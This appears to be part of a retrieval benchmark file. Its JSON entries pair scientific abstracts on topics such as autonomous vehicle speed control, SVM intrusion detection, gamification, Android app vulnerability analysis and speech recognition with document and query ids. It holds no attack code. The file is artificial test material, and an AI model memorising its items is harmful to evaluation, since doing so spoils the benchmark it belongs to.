"text": "In this paper, we present a novel control law for longitudinal speed control of autonomous vehicles. The key contributions of the proposed work include the design of a control law that reactively integrates the longitudinal surface gradient of road into its operation. In contrast to the existing works, we found that integrating the path gradient into the control framework improves the speed tracking efficacy. Since the control law is implemented over a shrinking domain scheme, it minimizes the integrated error by recomputing the control inputs at every discretized step and consequently provides less reaction time. This makes our control law suitable for motion planning frameworks that are operating at high frequencies. Furthermore, our work is implemented using a generalized vehicle model and can be easily extended to other classes of vehicles. The performance of gradient aware shrinking domain based controller is implemented and tested on a stock electric vehicle on which a number of sensors are mounted. Results from the tests show the robustness of our control law for speed tracking on a terrain with varying gradient while also considering stringent time constraints imposed by the planning framework.",
"title": ""
},
{
"docid": "937cb60b2eea0611e9c2b55dcbd85457",
"text": "In the era of big data, with the increasing number of audit data features, human-centered smart intrusion detection system performance is decreasing in training time and classification accuracy, and many support vector machine (SVM)-based intrusion detection algorithms have been widely used to identify an intrusion quickly and accurately. This paper proposes the FWP-SVM-genetic algorithm (GA) (feature selection, weight, and parameter optimization of support vector machine based on the genetic algorithm) based on the characteristics of the GA and the SVM algorithm. The algorithm first optimizes the crossover probability and mutation probability of GA according to the population evolution algebra and fitness value; then, it subsequently uses a feature selection method based on the genetic algorithm with an innovation in the fitness function that decreases the SVM error rate and increases the true positive rate. Finally, according to the optimal feature subset, the feature weights and parameters of SVM are simultaneously optimized. The simulation results show that the algorithm accelerates the algorithm convergence, increases the true positive rate, decreases the error rate, and shortens the classification time. Compared with other SVM-based intrusion detection algorithms, the detection rate is higher and the false positive and false negative rates are lower.",
"title": ""
},
{
"docid": "78e21364224b9aa95f86ac31e38916ef",
"text": "Gamification is the use of game design elements and game mechanics in non-game contexts. This idea has been used successfully in many web based businesses to increase user engagement. Some researchers suggest that it could also be used in web based education as a tool to increase student motivation and engagement. In an attempt to verify those theories, we have designed and built a gamification plugin for a well-known e-learning platform. We have made an experiment using this plugin in a university course, collecting quantitative and qualitative data in the process. Our findings suggest that some common beliefs about the benefits obtained when using games in education can be challenged. Students who completed the gamified experience got better scores in practical assignments and in overall score, but our findings also suggest that these students performed poorly on written assignments and participated less on class activities, although their initial motivation was higher. 2013 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "90e218a8ae79dc1d53e53d4eb63839b8",
"text": "Doubly fed induction generator (DFIG) technology is the dominant technology in the growing global market for wind power generation, due to the combination of variable-speed operation and a cost-effective partially rated power converter. However, the DFIG is sensitive to dips in supply voltage and without specific protection to “ride-through” grid faults, a DFIG risks damage to its power converter due to overcurrent and/or overvoltage. Conventional converter protection via a sustained period of rotor-crowbar closed circuit leads to poor power output and sustained suppression of the stator voltages. A new minimum-threshold rotor-crowbar method is presented in this paper, improving fault response by reducing crowbar application periods to 11-16 ms, successfully diverting transient overcurrents, and restoring good power control within 45 ms of both fault initiation and clearance, thus enabling the DFIG to meet grid-code fault-ride-through requirements. The new method is experimentally verified and evaluated using a 7.5-kW test facility.",
"title": ""
},
{
"docid": "aaececc42ba6d87ec018788fa73bc792",
"text": "This review set out to address three apparently simple questions: What makes 'great teaching'? What kinds of frameworks or tools could help us to capture it? How could this promote better learning? Question 1: \" What makes great teaching? \" Great teaching is defined as that which leads to improved student progress We define effective teaching as that which leads to improved student achievement using outcomes that matter to their future success. Defining effective teaching is not easy. The research keeps coming back to this critical point: student progress is the yardstick by which teacher quality should be assessed. Ultimately, for a judgement about whether teaching is effective, to be seen as trustworthy, it must be checked against the progress being made by students. The six components of great teaching Schools currently use a number of frameworks that describe the core elements of effective teaching. The problem is that these attributes are so broadly defined that they can be open to wide and different interpretation whether high quality teaching has been observed in the classroom. It is important to understand these limitations when making assessments about teaching quality. Below we list the six common components suggested by research that teachers should consider when assessing teaching quality. We list these approaches, skills and knowledge in order of how strong the evidence is in showing that focusing on them can improve student outcomes. This should be seen as offering a 'starter kit' for thinking about effective pedagogy. Good quality teaching will likely involve a combination of these attributes manifested at different times; the very best teachers are those that demonstrate all of these features. The most effective teachers have deep knowledge of the subjects they teach, and when teachers' knowledge falls below a certain level it is a significant impediment to students' learning. As well as a strong understanding of the material being taught, teachers must also understand the ways students think about the content, be able to evaluate the thinking behind students' own methods, and identify students' common misconceptions. Includes elements such as effective questioning and use of assessment by teachers. Specific practices, like reviewing previous learning, providing model responses for students, giving adequate time for practice to embed skills securely Executive Summary 3 and progressively introducing new learning (scaffolding) are also elements of high quality instruction. 3. Classroom climate (Moderate evidence of impact on student outcomes) Covers …",
"title": ""
},
{
"docid": "3c8cc4192ee6ddd126e53c8ab242f396",
"text": "There are several approaches for automated functional web testing and the choice among them depends on a number of factors, including the tools used for web testing and the costs associated with their adoption. In this paper, we present an empirical cost/benefit analysis of two different categories of automated functional web testing approaches: (1) capture-replay web testing (in particular, using Selenium IDE); and, (2) programmable web testing (using Selenium WebDriver). On a set of six web applications, we evaluated the costs of applying these testing approaches both when developing the initial test suites from scratch and when the test suites are maintained, upon the release of a new software version. Results indicate that, on the one hand, the development of the test suites is more expensive in terms of time required (between 32% and 112%) when the programmable web testing approach is adopted, but on the other hand, test suite maintenance is less expensive when this approach is used (with a saving between 16% and 51%). We found that, in the majority of the cases, after a small number of releases (from one to three), the cumulative cost of programmable web testing becomes lower than the cost involved with capture-replay web testing and the cost saving gets amplified over the successive releases.",
"title": ""
},
{
"docid": "0c3387ec7ed161d931bc08151e722d10",
"text": "New updated! The latest book from a very famous author finally comes out. Book of the tower of hanoi myths and maths, as an amazing reference becomes what you need to get. What's for is this book? Are you still thinking for what the book is? Well, this is what you probably will get. You should have made proper choices for your better life. Book, as a source that may involve the facts, opinion, literature, religion, and many others are the great friends to join with.",
"title": ""
},
{
"docid": "55f118976784a7244859e0256c4660e3",
"text": "The developments of content based image retrieval (CBIR) systems used for image archiving are continued and one of the important research topics. Although some studies have been presented general image achieving, proposed CBIR systems for archiving of medical images are not very efficient. In presented study, it is examined the retrieval efficiency rate of spatial methods used for feature extraction for medical image retrieval systems. The investigated algorithms in this study depend on gray level co-occurrence matrix (GLCM), gray level run length matrix (GLRLM), and Gabor wavelet accepted as spatial methods. In the experiments, the database is built including hundreds of medical images such as brain, lung, sinus, and bone. The results obtained in this study shows that queries based on statistics obtained from GLCM are satisfied. However, it is observed that Gabor Wavelet has been the most effective and accurate method.",
"title": ""
},
{
"docid": "fd3297e53076595bdffccabe78e17a46",
"text": "The UrBan Interactions (UBI) research program, coordinated by the University of Oulu, has created a middleware layer on top of the panOULU wireless network and opened it up to ubiquitous-computing researchers, offering opportunities to enhance and facilitate communication between citizens and the government.",
"title": ""
},
{
"docid": "6020b70701164e0a14b435153db1743e",
"text": "Supply chain Management has assumed a significant role in firm's performance and has attracted serious research attention over the last few years. In this paper attempt has been made to review the literature on Supply Chain Management. A literature review reveals a considerable spurt in research in theory and practice of SCM. We have presented a literature review for 29 research papers for the period between 2005 and 2011. The aim of this study was to provide an up-to-date and brief review of the SCM literature that was focused on broad areas of the SCM concept.",
"title": ""
},
{
"docid": "4076b5d1338a7552453e284019406129",
"text": "Knowledge bases (KBs) are paramount in NLP. We employ multiview learning for increasing accuracy and coverage of entity type information in KBs. We rely on two metaviews: language and representation. For language, we consider high-resource and lowresource languages from Wikipedia. For representation, we consider representations based on the context distribution of the entity (i.e., on its embedding), on the entity’s name (i.e., on its surface form) and on its description in Wikipedia. The two metaviews language and representation can be freely combined: each pair of language and representation (e.g., German embedding, English description, Spanish name) is a distinct view. Our experiments on entity typing with fine-grained classes demonstrate the effectiveness of multiview learning. We release MVET, a large multiview – and, in particular, multilingual – entity typing dataset we created. Monoand multilingual finegrained entity typing systems can be evaluated on this dataset.",
"title": ""
},
{
"docid": "0a0e33e03036ef025eb8450bedaf0c1f",
"text": "Recently there has been considerable interest in EEG-based emotion recognition (EEG-ER), which is one of the utilization of BCI. However, it is not easy to realize the EEG-ER system which can recognize emotions with high accuracy because of the tendency for important information in EEG signals to be concealed by noises. Deep learning is the golden tool to grasp the features concealed in EEG data and enable highly accurate EEG-ER because deep neural networks (DNNs) may have higher recognition capability than humans'. The publicly available dataset named DEAP, which is for emotion analysis using EEG, was used in the experiment. The CNN and a conventional model used for comparison are evaluated by the tests according to 11-fold cross validation scheme. EEG raw data obtained from 16 electrodes without general preprocesses were used as input data. The models classify and recognize EEG signals according to the emotional states \"positive\" or \"negative\" which were caused by watching music videos. The results show that the more training data are, the much higher the accuracies of CNNs are (by over 20%). It also suggests that the increased training data need not to belong to the same person's EEG data as the test data so as to get the CNN recognizing emotions accurately. The results indicate that there are not only the considerable amount of the interpersonal difference but also commonality of EEG properties.",
"title": ""
},
{
"docid": "49568236b0e221053c32b73b896d3dde",
"text": "The continuous growth in the size and use of the Internet is creating difficulties in the search for information. A sophisticated method to organize the layout of the information and assist user navigation is therefore particularly important. In this paper, we evaluate the feasibility of using a self-organizing map (SOM) to mine web log data and provide a visual tool to assist user navigation. We have developed LOGSOM, a system that utilizes Kohonen’s self-organizing map to organize web pages into a two-dimensional map. The organization of the web pages is based solely on the users’ navigation behavior, rather than the content of the web pages. The resulting map not only provides a meaningful navigation tool (for web users) that is easily incorporated with web browsers, but also serves as a visual analysis tool for webmasters to better understand the characteristics and navigation behaviors of web users visiting their pages. D 2002 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "f001d0801b892b9a85bd8cf4870f1007",
"text": "Several supervised approaches have been proposed for causality identification by relying on shallow linguistic features. However, such features do not lead to improved performance. Therefore, novel sources of knowledge are required to achieve progress on this problem. In this paper, we propose a model for the recognition of causality in verb-noun pairs by employing additional types of knowledge along with linguistic features. In particular, we focus on identifying and employing semantic classes of nouns and verbs with high tendency to encode cause or non-cause relations. Our model incorporates the information about these classes to minimize errors in predictions made by a basic supervised classifier relying merely on shallow linguistic features. As compared with this basic classifier our model achieves 14.74% (29.57%) improvement in F-score (accuracy), respectively.",
"title": ""
},
{
"docid": "bdd44aeacddeefdfc2e3a5abf1088f2c",
"text": "Elevation data is an important component of geospatial database. This paper focuses on digital surface model (DSM) generation from high-resolution satellite imagery (HRSI). The HRSI systems, such as IKONOS and QuickBird have initialed a new era of Earth observation and digital mapping. The half-meter or better resolution imagery from Worldview-1 and the planned GeoEye-1 allows for accurate and reliable extraction and characterization of even more details of the earth surface. In this paper, the DSM is generated using an advanced image matching approach which integrates point and edge matching algorithms. This approach produces reliable, precise, and very dense 3D points for high quality digital surface models which also preserve discontinuities. Following the DSM generation, the accuracy of the DSM has been assessed and reported. To serve both as a reference surface and a basis for comparison, a lidar DSM has been employed in a testfield with differing terrain types and slope.",
"title": ""
}
] | scidocsrr |
b5ebf4bb779afe0b26086033e9b4cb89 | Exploiting web images for event recognition in consumer videos: A multiple source domain adaptation approach | [
{
"docid": "df163d94fbf0414af1dde4a9e7fe7624",
"text": "This paper introduces a web image dataset created by NUS's Lab for Media Search. The dataset includes: (1) 269,648 images and the associated tags from Flickr, with a total of 5,018 unique tags; (2) six types of low-level features extracted from these images, including 64-D color histogram, 144-D color correlogram, 73-D edge direction histogram, 128-D wavelet texture, 225-D block-wise color moments extracted over 5x5 fixed grid partitions, and 500-D bag of words based on SIFT descriptions; and (3) ground-truth for 81 concepts that can be used for evaluation. Based on this dataset, we highlight characteristics of Web image collections and identify four research issues on web image annotation and retrieval. We also provide the baseline results for web image annotation by learning from the tags using the traditional k-NN algorithm. The benchmark results indicate that it is possible to learn effective models from sufficiently large image dataset to facilitate general image retrieval.",
"title": ""
},
{
"docid": "f78fcf875104f8bab2fa465c414331c6",
"text": "In this paper, we present a systematic framework for recognizing realistic actions from videos “in the wild”. Such unconstrained videos are abundant in personal collections as well as on the Web. Recognizing action from such videos has not been addressed extensively, primarily due to the tremendous variations that result from camera motion, background clutter, changes in object appearance, and scale, etc. The main challenge is how to extract reliable and informative features from the unconstrained videos. We extract both motion and static features from the videos. Since the raw features of both types are dense yet noisy, we propose strategies to prune these features. We use motion statistics to acquire stable motion features and clean static features. Furthermore, PageRank is used to mine the most informative static features. In order to further construct compact yet discriminative visual vocabularies, a divisive information-theoretic algorithm is employed to group semantically related features. Finally, AdaBoost is chosen to integrate all the heterogeneous yet complementary features for recognition. We have tested the framework on the KTH dataset and our own dataset consisting of 11 categories of actions collected from YouTube and personal videos, and have obtained impressive results for action recognition and action localization.",
"title": ""
},
{
"docid": "6148a8847c01d46931250b959087b1b1",
"text": "Recognizing visual content in unconstrained videos has become a very important problem for many applications. Existing corpora for video analysis lack scale and/or content diversity, and thus limited the needed progress in this critical area. In this paper, we describe and release a new database called CCV, containing 9,317 web videos over 20 semantic categories, including events like \"baseball\" and \"parade\", scenes like \"beach\", and objects like \"cat\". The database was collected with extra care to ensure relevance to consumer interest and originality of video content without post-editing. Such videos typically have very little textual annotation and thus can benefit from the development of automatic content analysis techniques.\n We used Amazon MTurk platform to perform manual annotation, and studied the behaviors and performance of human annotators on MTurk. We also compared the abilities in understanding consumer video content by humans and machines. For the latter, we implemented automatic classifiers using state-of-the-art multi-modal approach that achieved top performance in recent TRECVID multimedia event detection task. Results confirmed classifiers fusing audio and video features significantly outperform single-modality solutions. We also found that humans are much better at understanding categories of nonrigid objects such as \"cat\", while current automatic techniques are relatively close to humans in recognizing categories that have distinctive background scenes or audio patterns.",
"title": ""
}
] | [
{
"docid": "b6508d1f2b73b90a0cfe6399f6b44421",
"text": "An alternative to land spreading of manure effluents is to mass-culture algae on the N and P present in the manure and convert manure N and P into algal biomass. The objective of this study was to determine how the fatty acid (FA) content and composition of algae respond to changes in the type of manure, manure loading rate, and to whether the algae was grown with supplemental carbon dioxide. Algal biomass was harvested weekly from indoor laboratory-scale algal turf scrubber (ATS) units using different loading rates of raw and anaerobically digested dairy manure effluents and raw swine manure effluent. Manure loading rates corresponded to N loading rates of 0.2 to 1.3 g TN m−2 day−1 for raw swine manure effluent and 0.3 to 2.3 g TN m−2 day−1 for dairy manure effluents. In addition, algal biomass was harvested from outdoor pilot-scale ATS units using different loading rates of raw and anaerobically digested dairy manure effluents. Both indoor and outdoor units were dominated by Rhizoclonium sp. FA content values of the algal biomass ranged from 0.6 to 1.5% of dry weight and showed no consistent relationship to loading rate, type of manure, or to whether supplemental carbon dioxide was added to the systems. FA composition was remarkably consistent among samples and >90% of the FA content consisted of 14:0, 16:0, 16:1ω7, 16:1ω9, 18:0, 18:1ω9, 18:2 ω6, and 18:3ω3.",
"title": ""
},
{
"docid": "74c39dfd176da58b264acfd7c2260821",
"text": "This non-experimental, causal study related to examine and explore the relationships among electronic service quality, customer satisfaction, electronics recovery service quality, and customer loyalty for consumer electronics e-tailers. This study adopted quota and snowball sampling. A total of 121 participants completed the online survey. Out of seven hypotheses in this study, five were supported, whereas two were not supported. Findings indicated that electronic recovery service quality had positive effect on customer loyalty. However, findings indicated that electronic recovery service quality had no effect on perceived value and customer satisfaction. Findings also indicated that perceived value and customer satisfaction were two significant variables that mediated the relationships between electronic service quality and customer loyalty. Moreover, this study found that electronic service quality had no direct effect on customer satisfaction, but had indirect positive effects on customer satisfaction for consumer electronics e-tailers. In terms of practical implications, consumer electronics e-tailers' managers could formulate a competitive strategy based on the modified Electronic Customer Relationship Re-Establishment model to retain current customers and to enhance customer relationship management (CRM). The limitations and recommendations for future research were also included in this study.",
"title": ""
},
{
"docid": "01e064e0f2267de5a26765f945114a6e",
"text": "In this paper, we make contact with the field of nonparametric statistics and present a development and generalization of tools and results for use in image processing and reconstruction. In particular, we adapt and expand kernel regression ideas for use in image denoising, upscaling, interpolation, fusion, and more. Furthermore, we establish key relationships with some popular existing methods and show how several of these algorithms, including the recently popularized bilateral filter, are special cases of the proposed framework. The resulting algorithms and analyses are amply illustrated with practical examples",
"title": ""
},
{
"docid": "fa7ec2419ffc22b1ee43694b5f4e21b9",
"text": "We consider the problem of finding outliers in large multivariate databases. Outlier detection can be applied during the data cleansing process of data mining to identify problems with the data itself, and to fraud detection where groups of outliers are often of particular interest. We use replicator neural networks (RNNs) to provide a measure of the outlyingness of data records. The performance of the RNNs is assessed using a ranked score measure. The effectiveness of the RNNs for outlier detection is demonstrated on two publicly available databases.",
"title": ""
},
{
"docid": "06b81ec29ee26f13720891eea9f902df",
"text": "This paper reports the design of a Waveguide-Fed Cavity Backed Slot Antenna Array in Ku-band. The antenna is made entire via simple milling process. The overall antenna structure consists of 3 layers. The bottom layer is a waveguide feed network to provide corporate power division. In turn, the waveguide feed network is fed by a conventional SMA connector from the back. The waveguide network couples energy to an array of cavity via an aperture. This constitutes the middle layer. Each cavity then excites an array of 2×2 radiating slots in the top layer. The radiating slot elements and the feed network are designed to achieve wide bandwidth and gain performance. Finally, an 8×8 array antenna is designed with about 25dBi gain and bandwidth of 1.6GHz in the Ku-band.",
"title": ""
},
{
"docid": "a15e9c4cf715be331a3cb388b8c7eda1",
"text": "We present a preliminary analysis of the use of WordNet hypernyms for answering “What-is” questions. We analyse the approximately 130 definitional questions in the TREC10 corpus with respect to our technique of Virtual Annotation (VA), which has previously been shown to be effective on the TREC9 definitional question set and other questions. We discover that VA is effective on a subset of the TREC10 definitional questions, but that some of these questions seem to need a user model to generate correct answers, or at least answers that agree with the NIST judges. Furthermore, there remains a large enough subset of definitional questions that cannot benefit at all from the WordNet isa-hierarchy, prompting the need to investigate alternative external resources.",
"title": ""
},
{
"docid": "f3c1f43cd345669a6cb5a7ba6f1ca94c",
"text": "Uric acid (UA) is the end product of purine metabolism and can reportedly act as an antioxidant. However, recently, numerous clinical and basic research approaches have revealed close associations of hyperuricemia with several disorders, particularly those comprising the metabolic syndrome. In this review, we first outline the two molecular mechanisms underlying inflammation occurrence in relation to UA metabolism; one is inflammasome activation by UA crystallization and the other involves superoxide free radicals generated by xanthine oxidase (XO). Importantly, recent studies have demonstrated the therapeutic or preventive effects of XO inhibitors against atherosclerosis and nonalcoholic steatohepatitis, which were not previously considered to be related, at least not directly, to hyperuricemia. Such beneficial effects of XO inhibitors have been reported for other organs including the kidneys and the heart. Thus, a major portion of this review focuses on the relationships between UA metabolism and the development of atherosclerosis, nonalcoholic steatohepatitis, and related disorders. Although further studies are necessary, XO inhibitors are a potentially novel strategy for reducing the risk of many forms of organ failure characteristic of the metabolic syndrome.",
"title": ""
},
{
"docid": "3ed927f16de87a753fd7c1cc2cce7cef",
"text": "The state-of-the-art in securing mobile software systems are substantially intended to detect and mitigate vulnerabilities in a single app, but fail to identify vulnerabilities that arise due to the interaction of multiple apps, such as collusion attacks and privilege escalation chaining, shown to be quite common in the apps on the market. This paper demonstrates COVERT, a novel approach and accompanying tool-suite that relies on a hybrid static analysis and lightweight formal analysis technique to enable compositional security assessment of complex software. Through static analysis of Android application packages, it extracts relevant security specifications in an analyzable formal specification language, and checks them as a whole for inter-app vulnerabilities. To our knowledge, COVERT is the first formally-precise analysis tool for automated compositional analysis of Android apps. Our study of hundreds of Android apps revealed dozens of inter-app vulnerabilities, many of which were previously unknown. A video highlighting the main features of the tool can be found at: http://youtu.be/bMKk7OW7dGg.",
"title": ""
},
{
"docid": "af7736d4e796d3439613ed06ca4e4b72",
"text": "The past few years have witnessed the fast development of different regularization methods for deep learning models such as fully-connected deep neural networks (DNNs) and Convolutional Neural Networks (CNNs). Most of previous methods mainly consider to drop features from input data and hidden layers, such as Dropout, Cutout and DropBlocks. DropConnect select to drop connections between fully-connected layers. By randomly discard some features or connections, the above mentioned methods control the overfitting problem and improve the performance of neural networks. In this paper, we proposed two novel regularization methods, namely DropFilter and DropFilter-PLUS, for the learning of CNNs. Different from the previous methods, DropFilter and DropFilter-PLUS selects to modify the convolution filters. For DropFilter-PLUS, we find a suitable way to accelerate the learning process based on theoretical analysis. Experimental results on MNISTshow that using DropFilter and DropFilter-PLUS may improve performance on image classification tasks.",
"title": ""
},
{
"docid": "55969912d37a5550953b954ba4efd7d3",
"text": "Apart from some general issues related to the Gender Identity Disorder (GID) diagnosis, such as whether it should stay in the DSM-V or not, a number of problems specifically relate to the current criteria of the GID diagnosis for adolescents and adults. These problems concern the confusion caused by similarities and differences of the terms transsexualism and GID, the inability of the current criteria to capture the whole spectrum of gender variance phenomena, the potential risk of unnecessary physically invasive examinations to rule out intersex conditions (disorders of sex development), the necessity of the D criterion (distress and impairment), and the fact that the diagnosis still applies to those who already had hormonal and surgical treatment. If the diagnosis should not be deleted from the DSM, most of the criticism could be addressed in the DSM-V if the diagnosis would be renamed, the criteria would be adjusted in wording, and made more stringent. However, this would imply that the diagnosis would still be dichotomous and similar to earlier DSM versions. Another option is to follow a more dimensional approach, allowing for different degrees of gender dysphoria depending on the number of indicators. Considering the strong resistance against sexuality related specifiers, and the relative difficulty assessing sexual orientation in individuals pursuing hormonal and surgical interventions to change physical sex characteristics, it should be investigated whether other potentially relevant specifiers (e.g., onset age) are more appropriate.",
"title": ""
},
{
"docid": "dd9d4b47ea4a43a5c228f7b0abb0ddd1",
"text": "Due to the growing popularity of Description Logics-based knowledge representation systems, predominantly in the context of Semantic Web applications, there is a rising demand for tools offering non-standard reasoning services. One particularly interesting form of reasoning, both from the user as well as the ontology engineering perspective, is abduction. In this paper we introduce two novel reasoning calculi for solving ABox abduction problems in the Description Logic ALC, i.e. problems of finding minimal sets of ABox axioms, which when added to the knowledge base enforce entailment of a requested set of assertions. The algorithms are based on regular connection tableaux and resolution with set-of-support and are proven to be sound and complete. We elaborate on a number of technical issues involved and discuss some practical aspects of reasoning with the methods.",
"title": ""
},
{
"docid": "308da592c92c2343ffdc460786cc46c9",
"text": "Electroluminescence (EL) imaging is a useful modality for the inspection of photovoltaic (PV) modules. EL images provide high spatial resolution, which makes it possible to detect even finest defects on the surface of PV modules. However, the analysis of EL images is typically a manual process that is expensive, time-consuming, and requires expert knowledge of many different types of defects. In this work, we investigate two approaches for automatic detection of such defects in a single image of a PV cell. The approaches differ in their hardware requirements, which are dictated by their respective application scenarios. The more hardware-efficient approach is based on hand-crafted features that are classified in a Support Vector Machine (SVM). To obtain a strong performance, we investigate and compare various processing variants. The more hardware-demanding approach uses an end-to-end deep Convolutional Neural Network (CNN) that runs on a Graphics Processing Unit (GPU). Both approaches are trained on 1,968 cells extracted from high resolution EL intensity images of monoand polycrystalline PV modules. The CNN is more accurate, and reaches an average accuracy of 88.42%. The SVM achieves a slightly lower average accuracy of 82.44%, but can run on arbitrary hardware. Both automated approaches make continuous, highly accurate monitoring of PV cells feasible.",
"title": ""
},
{
"docid": "f6df133663ab4342222d95a20cd09996",
"text": "Web 2.0 has led to the development and evolution of web-based communities and applications. These communities provide places for information sharing and collaboration. They also open the door for inappropriate online activities, such as harassment, in which some users post messages in a virtual community that are intentionally offensive to other members of the community. It is a new and challenging task to detect online harassment; currently few systems attempt to solve this problem. In this paper, we use a supervised learning approach for detecting harassment. Our technique employs content features, sentiment features, and contextual features of documents. The experimental results described herein show that our method achieves significant improvements over several baselines, including Term FrequencyInverse Document Frequency (TFIDF) approaches. Identification of online harassment is feasible when TFIDF is supplemented with sentiment and contextual feature attributes.",
"title": ""
},
{
"docid": "fcc7ef9f58038eead6e55b27b0cf5f0b",
"text": "Project managers aim at keeping track of interdependencies between various artifacts of the software development lifecycle, to find out potential requirements conflicts, to better understand the impact of change requests, and to fulfill process quality standards, such as CMMI requirements. While there are many methods and techniques on how to technically store requirements traces, the economic issues of dealing with requirements tracing complexity remain open. In practice tracing is typically not an explicit systematic process, but occurs rather ad hoc with considerable hidden tracing-related quality costs. This paper reports a case study on value-based requirements tracing (VBRT) that systematically supports project managers in tailoring requirements tracing precision and effort based on the parameters stakeholder value, requirements risk/volatility, and tracing costs. Main results of the case study were: (a) VBRT took around 35% effort of full requirements tracing; (b) more risky or volatile requirements warranted more detailed tracing because of their higher change probability.",
"title": ""
},
{
"docid": "20b28dd4a0717add4e032976a7946109",
"text": "In planning an s-curve speed profile for a computer numerical control (CNC) machine, centripetal acceleration and its derivative have to be considered. In a CNC machine, these quantities dictate how much voltage and current should be applied to servo motor windings. In this paper, the necessity of considering centripetal jerk in speed profile generation especially in the look-ahead mode is explained. It is demonstrated that the magnitude of centripetal jerk is proportional to the curvature derivative of the path known as \"sharpness\". It is also explained that a proper limited jerk motion is only possible when a G2-continuous machining path is planned. Then using a simplified mathematical representation of clothoids, a novel method for approximating a given path with a sequence of clothoid segments is proposed. Using this method, a semi-parallel G2-continuous path with adjustable deviation from the original shape for a sample machining contour is generated. Maximum permissible feed rate for the generated path is also calculated.",
"title": ""
},
{
"docid": "a2047969c4924a1e93b805b4f7d2402c",
"text": "Knowledge is a resource that is valuable to an organization's ability to innovate and compete. It exists within the individual employees, and also in a composite sense within the organization. According to the resourcebased view of the firm (RBV), strategic assets are the critical determinants of an organization's ability to maintain a sustainable competitive advantage. This paper will combine RBV theory with characteristics of knowledge to show that organizational knowledge is a strategic asset. Knowledge management is discussed frequently in the literature as a mechanism for capturing and disseminating the knowledge that exists within the organization. This paper will also explain practical considerations for implementation of knowledge management principles.",
"title": ""
},
{
"docid": "d3fbf7429dff6f68ec06014467b0217a",
"text": "This paper presents a hierarchical framework for detecting local and global anomalies via hierarchical feature representation and Gaussian process regression (GPR) which is fully non-parametric and robust to the noisy training data, and supports sparse features. While most research on anomaly detection has focused more on detecting local anomalies, we are more interested in global anomalies that involve multiple normal events interacting in an unusual manner, such as car accidents. To simultaneously detect local and global anomalies, we cast the extraction of normal interactions from the training videos as a problem of finding the frequent geometric relations of the nearby sparse spatio-temporal interest points (STIPs). A codebook of interaction templates is then constructed and modeled using the GPR, based on which a novel inference method for computing the likelihood of an observed interaction is also developed. Thereafter, these local likelihood scores are integrated into globally consistent anomaly masks, from which anomalies can be succinctly identified. To the best of our knowledge, it is the first time GPR is employed to model the relationship of the nearby STIPs for anomaly detection. Simulations based on four widespread datasets show that the new method outperforms the main state-of-the-art methods with lower computational burden.",
"title": ""
},
{
"docid": "304f4e48ac5d5698f559ae504fc825d9",
"text": "How the circadian clock regulates the timing of sleep is poorly understood. Here, we identify a Drosophila mutant, wide awake (wake), that exhibits a marked delay in sleep onset at dusk. Loss of WAKE in a set of arousal-promoting clock neurons, the large ventrolateral neurons (l-LNvs), impairs sleep onset. WAKE levels cycle, peaking near dusk, and the expression of WAKE in l-LNvs is Clock dependent. Strikingly, Clock and cycle mutants also exhibit a profound delay in sleep onset, which can be rescued by restoring WAKE expression in LNvs. WAKE interacts with the GABAA receptor Resistant to Dieldrin (RDL), upregulating its levels and promoting its localization to the plasma membrane. In wake mutant l-LNvs, GABA sensitivity is decreased and excitability is increased at dusk. We propose that WAKE acts as a clock output molecule specifically for sleep, inhibiting LNvs at dusk to promote the transition from wake to sleep.",
"title": ""
},
{
"docid": "31702c432c5bd1716599ca8a0aa54819",
"text": "Data sampling has been extensively studied for large scale graph mining. Many analyses and tasks become more efficient when performed on graph samples of much smaller size. The use of proxy objects is common in software engineering for analysis and interaction with heavy objects or systems. In this paper, we coin the term ’proxy graph’ and empirically investigate how well a proxy graph visualization can represent a big graph. Our investigation focuses on proxy graphs obtained by sampling; this is one of the most common proxy approaches. Despite the plethora of data sampling studies, this is the first evaluation of sampling in the context of graph visualization. For an objective evaluation, we propose a new family of quality metrics for visual quality of proxy graphs. Our experiments cover popular sampling techniques. Our experimental results lead to guidelines for using sampling-based proxy graphs in visualization.",
"title": ""
}
] | scidocsrr |
cdd33093cd376752c3f5f677bd5a53ea | Tree quantization for large-scale similarity search and classification | [
{
"docid": "f18c9cecdd3b7697af7c160906d6d501",
"text": "A new data structure for efficient similarity search in very large dataseis of high-dimensional vectors is introduced. This structure called the inverted multi-index generalizes the inverted index idea by replacing the standard quantization within inverted indices with product quantization. For very similar retrieval complexity and preprocessing time, inverted multi-indices achieve a much denser subdivision of the search space compared to inverted indices, while retaining their memory efficiency. Our experiments with large dataseis of SIFT and GIST vectors demonstrate that because of the denser subdivision, inverted multi-indices are able to return much shorter candidate lists with higher recall. Augmented with a suitable reranking procedure, multi-indices were able to improve the speed of approximate nearest neighbor search on the dataset of 1 billion SIFT vectors by an order of magnitude compared to the best previously published systems, while achieving better recall and incurring only few percent of memory overhead.",
"title": ""
}
] | [
{
"docid": "bcd7af5c474d931c0a76b654775396c2",
"text": "Task and motion planning subject to Linear Temporal Logic (LTL) specifications in complex, dynamic environments requires efficient exploration of many possible future worlds. Model-free reinforcement learning has proven successful in a number of challenging tasks, but shows poor performance on tasks that require long-term planning. In this work, we integrate Monte Carlo Tree Search with hierarchical neural net policies trained on expressive LTL specifications. We use reinforcement learning to find deep neural networks representing both low-level control policies and task-level “option policies” that achieve high-level goals. Our combined architecture generates safe and responsive motion plans that respect the LTL constraints. We demonstrate our approach in a simulated autonomous driving setting, where a vehicle must drive down a road in traffic, avoid collisions, and navigate an intersection, all while obeying rules of the road.",
"title": ""
},
{
"docid": "260c12152d9bd38bd0fde005e0394e17",
"text": "On the initiative of the World Health Organization, two meetings on the Standardization of Reporting Results of Cancer Treatment have been held with representatives and members of several organizations. Recommendations have been developed for standardized approaches to the recording of baseline data relating to the patient, the tumor, laboratory and radiologic data, the reporting of treatment, grading of acute and subacute toxicity, reporting of response, recurrence and disease-free interval, and reporting results of therapy. These recommendations, already endorsed by a number of organizations, are proposed for international acceptance and use to make it possible for investigators to compare validly their results with those of others.",
"title": ""
},
{
"docid": "1a154992369fc30c36613fc811df53ac",
"text": "Speech recognition is a subjective phenomenon. Despite being a huge research in this field, this process still faces a lot of problem. Different techniques are used for different purposes. This paper gives an overview of speech recognition process. Various progresses have been done in this field. In this work of project, it is shown that how the speech signals are recognized using back propagation algorithm in neural network. Voices of different persons of various ages",
"title": ""
},
{
"docid": "fc03ae4a9106e494d1b74451ca22190b",
